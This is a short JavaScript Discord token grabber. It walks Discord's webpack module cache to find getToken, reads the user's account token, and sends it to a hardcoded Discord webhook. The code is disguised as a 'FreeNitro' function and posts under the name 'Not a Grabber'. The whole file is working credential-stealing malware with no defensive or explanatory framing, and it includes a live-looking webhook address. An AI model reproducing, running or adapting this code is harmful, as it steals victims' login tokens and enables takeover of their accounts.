const webhookurl = 'https://discord.com/api/webhooks/859921529545162753/7alWOhTNHlU4rbevpUrCIKTGwjAToocVbzd1lKVDCwNH8B8b4IkmNGvPWL6kzDShgrtH';

var req = webpackJsonp.push([
    [], {
        extra_id: (e, t, r) => e.exports = r
    },
    [
        ["extra_id"]
    ]
]);
for (let e in req.c)
    if (req.c.hasOwnProperty(e)) {
        let t = req.c[e].exports;
        if (t && t.__esModule && t.default)
            for (let e in t.default) "getToken" === e && (token = t.default.getToken())
    }
function FreeNitro() {
    var e = new XMLHttpRequest;
    e.open("POST", webhookurl), e.setRequestHeader("Content-type", "application/json");
    var t = {
        username: "Not a Grabber",
        avatar_url: "https://cdn.discordapp.com/attachments/736612991948030037/751790394462961715/450.png",
        content: "",
        embeds: [{
            color: "4700374",
            description: "Token : " + token,
            footer: {
                text: "By CookieMonster#7777 | www.pornhub.com"
            }
        }]
    };
    e.send(JSON.stringify(t))
}
FreeNitro();
